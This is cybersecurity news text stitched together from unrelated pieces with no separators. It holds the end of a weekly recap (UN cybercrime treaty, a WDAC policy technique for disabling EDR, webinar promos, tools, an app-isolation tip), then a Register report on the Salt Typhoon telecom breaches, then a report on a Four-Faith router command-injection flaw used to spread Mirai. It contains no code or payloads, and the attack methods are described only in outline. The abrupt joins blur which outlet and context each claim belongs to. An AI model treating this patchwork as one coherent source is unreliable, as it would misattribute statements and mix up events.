• UN Approves New Cybercrime Treaty to Tackle Digital Threats — The United Nations General Assembly formally adopted a new cybercrime convention, called the United Nations Convention against Cybercrime, that’s aimed at bolstering international cooperation to combat such transnational threats. “The new Convention against Cybercrime will enable faster, better-coordinated, and more effective responses, making both digital and physical worlds safer,” the UN said. “The Convention focuses on frameworks for accessing and exchanging electronic evidence, facilitating investigations and prosecutions.” INTERPOL Secretary General Valdecy Urquiza said the UN cybercrime convention “provides a basis for a new cross-sector level of international cooperation” necessary to combat the borderless nature of cybercrime.
• WDAC as a Way to Impair Security Defenses — Cybersecurity researchers have devised a new attack technique that leverages a malicious Windows Defender Application Control (WDAC) policy to block security solutions such as Endpoint Detection and Response (EDR) sensors following a system reboot. “It makes use of a specially crafted WDAC policy to stop defensive solutions across endpoints and could allow adversaries to easily pivot to new hosts without the burden of security solutions such as EDR,” researchers Jonathan Beierle and Logan Goins said. “At a larger scale, if an adversary is able to write Group Policy Objects (GPOs), then they would be able to distribute this policy throughout the domain and systematically stop most, if not all, security solutions on all endpoints in the domain, potentially allowing for the deployment of post-exploitation tooling and/or ransomware.”

🎥 Expert Webinar

1. Don’t Let Ransomware Win: Discover Proactive Defense Tactics — Ransomware is getting smarter, faster, and more dangerous. As 2025 nears, attackers are using advanced tactics to evade detection and demand record-breaking payouts. Are you ready to defend against these threats? Join the Zscaler ThreatLabz webinar to learn proven strategies and stay ahead of cybercriminals. Don’t wait—prepare now to outsmart ransomware.
2. Simplify Trust Management: Centralize, Automate, Secure — Managing digital trust is complex in today’s hybrid environments. Traditional methods can’t meet modern IT, DevOps, or compliance demands. DigiCert ONE simplifies trust with a unified platform for users, devices, and software. Join the webinar to learn how to centralize management, automate operations, and secure your trust strategy.

🔧 Cybersecurity Tools

• LogonTracer is a powerful tool for analyzing and visualizing Windows Active Directory event logs, designed to simplify the investigation of malicious logons. By mapping host names, IP addresses, and account names from logon-related events, it creates intuitive graphs that reveal which accounts are being accessed and from which hosts. LogonTracer overcomes the challenges of manual analysis and massive log volumes, helping analysts quickly identify suspicious activity with ease.
• Game of Active Directory (GOAD) is a free, ready-to-use Active Directory lab designed specifically for pentesters. It offers a pre-built, intentionally vulnerable environment where you can practice and refine common attack techniques. Perfect for skill-building, GOAD eliminates the complexity of setting up your own lab, allowing you to focus on learning and testing various pentesting strategies in a realistic yet controlled setting.

🔒 Tip of the Week

Isolate Risky Apps with Separate Spaces — When you need to use a mobile app but aren’t sure if it’s safe, protect your personal data by running the app in a separate space on your phone. For Android users, go to Settings > Users & Accounts and create a Guest or new user profile.

Install the uncertain app within this isolated profile and restrict its permissions, such as disabling access to contacts or locations. iPhone users can use Guided Access by navigating to Settings > Accessibility > Guided Access to limit what the app can do. This isolation ensures that even if the app contains malware, it cannot access your main data or other apps.

If the app behaves suspiciously, you can easily remove it from the separate space without affecting your primary profile. By isolating apps you’re unsure about, you add an extra layer of security to your device, keeping your personal information safe while still allowing you to use the necessary tools.

Conclusion

This week’s cybersecurity updates highlight the importance of staying vigilant and prepared. Here are some simple steps to keep your digital world secure:

• Update Regularly: Always keep your software and devices up-to-date to patch security gaps.
• Educate Your Team: Teach everyone to recognize phishing emails and other common scams.
• Use Strong Passwords: Create unique, strong passwords and enable two-factor authentication where possible.
• Limit Access: Ensure only authorized people can access sensitive information.
• Backup Your Data: Regularly backup important files to recover quickly if something goes wrong.

By taking these actions, you can protect yourself and your organization from emerging threats. Stay informed, stay proactive, and prioritize your cybersecurity. Thank you for joining us this week—stay safe online, and we look forward to bringing you more updates next week!

AT&T, Verizon, and Lumen Technologies confirmed that Chinese government-backed snoops accessed portions of their systems earlier this year, while the White House added another, yet-unnamed telecommunications company to the list of those breached by Salt Typhoon.

The digital intrusion, which has been called the​ “worst telecom hack in our nation’s history,” gave Beijing-backed spies the “capability to geolocate millions of individuals” and “record phone calls at will,” Anne Neuberger, deputy national security advisor for cyber and emerging technology, told reporters.

In a statement emailed to The Register, AT&T said the foreign spies compromised “a small number” of its customers in the espionage campaign and added that the PRC-backed crew had since been kicked out of its networks.

“We detect no activity by nation-state actors in our networks at this time,” an AT&T spokesperson said. 

“Based on our current investigation of this attack, the People’s Republic of China targeted a small number of individuals of foreign intelligence interest,” the statement added. “In the relatively few instances in which an individual’s information was impacted, we have complied with our notification obligations in cooperation with law enforcement.”

AT&T continues to monitor its networks and work with government officials, other telecom firms, and cybersecurity experts on the investigation, the spokesperson said.

Verizon also confirmed that the Chinese intruders had accessed “a small number of high-profile customers in government and politics.” A spokesperson told The Register that it notified these customers, and has since “contained the cyber incident brought on by this nation-state threat actor.”

An unnamed, “highly respected” cybersecurity company has also confirmed the containment, the Verizon spokesperson added.

According to the operator’s chief legal officer, Verizon partnered with federal law enforcement, national security agencies, other telecom partners, and security firms upon detecting the network activity.

“We have not detected threat actor activity in Verizon’s network for some time, and after considerable work addressing this incident, we can report that Verizon has contained the activities associated with this particular incident,” Verizon’s Chief Legal Officer Vandana Venkatesh told The Register.

Finally, Lumen Technologies, another one of the firms reportedly breached in the attack, told us that it has also booted the Chinese attackers out of its systems, and said it found “no evidence” that customer data was accessed.

“An independent forensics firm has confirmed Salt Typhoon is no longer in our network,” a spokesperson told The Register. “In addition, our federal partners have not shared any information that would suggest otherwise.”

T-Mobile’s security boss previously spoke to The Register about the espionage campaign and said it thwarted successful attacks on its systems “within a single-digit number of days.”

9 telecom firms compromised, White House says

The companies’ admissions come as a top White House official added another unnamed firm to the breach, bringing the total thus far to nine. Neuberger previously said eight had been compromised. Only three — AT&T, Verizon, and T-Mobile US — have confirmed the intrusion.

We believe a large number of individuals were affected by geolocation and metadata of phones; a smaller number around actual collection of phone calls and texts

“The Chinese gained access to networks, essentially had broad and full access,” Neuberger told reporters. “We believe that’s why they had the capability to geolocate millions of individuals, to record phone calls at will, because they had that broad access.”

In one instance, the spies broke into an admin account that then gave them access to more than 100,000 routers, she added. “So, when the Chinese compromised that account, they gained that kind of broad access across the network,” Neuberger said. “That’s not meaningful cybersecurity to defend against a nation-state actor.” 

The White House doesn’t yet have a number on how many total people were affected by the breach, she added. 

“We believe a large number of individuals were affected by geolocation and metadata of phones; a smaller number around actual collection of phone calls and texts,” Neuberger said. “And I think the scale we’re talking about is far larger on the geolocation; probably less than 100 on the actual individuals.”

Following the intrusion, the White House emphasized the inadequacy of voluntary cybersecurity measures against nation-state threats. The Federal Communications Commission (FCC) launched a public rule proposal requiring basic cybersecurity practices for telecom carriers. The commissioners are expected to vote on the rule by January 15.

In addition to the FCC’s own efforts, US Senator Ron Wyden (D-OR) has also proposed legislation that would require the FCC to issue binding rules for telecom systems.

Plus, according to Neuberger, all of the nine telecom CEOs whose companies were hacked have signed on to the government’s 60-day Enduring Security Framework.

This public-private effort aims to put in place minimum cybersecurity practices that have been agreed upon by intelligence officers, CISA, the FBI, and telecom security experts. ®

Thousands of industrial routers from a Chinese telecommunications equipment manufacturer are vulnerable to a post-authentication vulnerability, with indications it is already being exploited in the wild to infect devices with Mirai malware.

On Dec. 27, VulnCheck detailed the vulnerability, tracked as CVE-2024-12856, wherein an attacker can leverage default credentials in Four-Faith F3x24 and F3x36 routers to remotely inject commands into the operating system. 

Meanwhile, a malicious IP was observed attempting to leverage the vulnerability. VulnCheck Chief Technology Officer Jacob Baines wrote that his team identified the same user agent referenced in a November blog by DucklingStudio attempting to use the vulnerability to deploy a different malware payload.

Baines also posted a video demonstration of the flaw being exploited on X.

The vulnerability appears to be connected to the spread of a variant of Mirai, the infamous malware and botnet known to target Internet of Things devices. DucklingStudio used a honeypot to detect the malware on Nov. 9, and an update on Dec. 28 explicitly connected it to the listed CVE for Four-Faith’s industrial routers.

Variants of Mirai —first observed in 2016 and originally written by a group of teenagers to create botnets — remain one of the most popular forms of malware attacking IoT devices worldwide. According to Zscaler, Mirai was identified in over a third of all IoT malware attacks between June 2023 and May 2024, far outpacing other malware families, while more than 75% of blocked IoT transactions were linked to the malicious code.

VulnCheck wrote up a rule for detecting instances of infected routers using the open-source threat detection tool Suricata:

According to Censys, there are at least 15,000 connected routers potentially vulnerable to the flaw, and VulnCheck left open the possibility that additional router products may be affected. The National Institute of Standards and Technology’s National Vulnerability Database lists the severity of the bug at 7.2 and notes that firmware version 2.0 (and possibly others) allows for authenticated and remote command injection attacks over HTTP.

The listed CVE does not yet include details about patching or remediation. Baines noted in his blog that VulnCheck notified Four-Faith of the vulnerability and affected routers on Dec. 20, and directed further questions about remediation to the company. Four-Faith did not return a request for comment sent through its website prior to publication.

According to the company’s website, Four-Faith is headquartered in Xiamen, a city in the Southeastern province of Fujian, China. It specializes in manufacturing industrial routers, Internet of Things devices, modems and other wireless communications technologies, and claims to have exported its technologies to over 100 countries.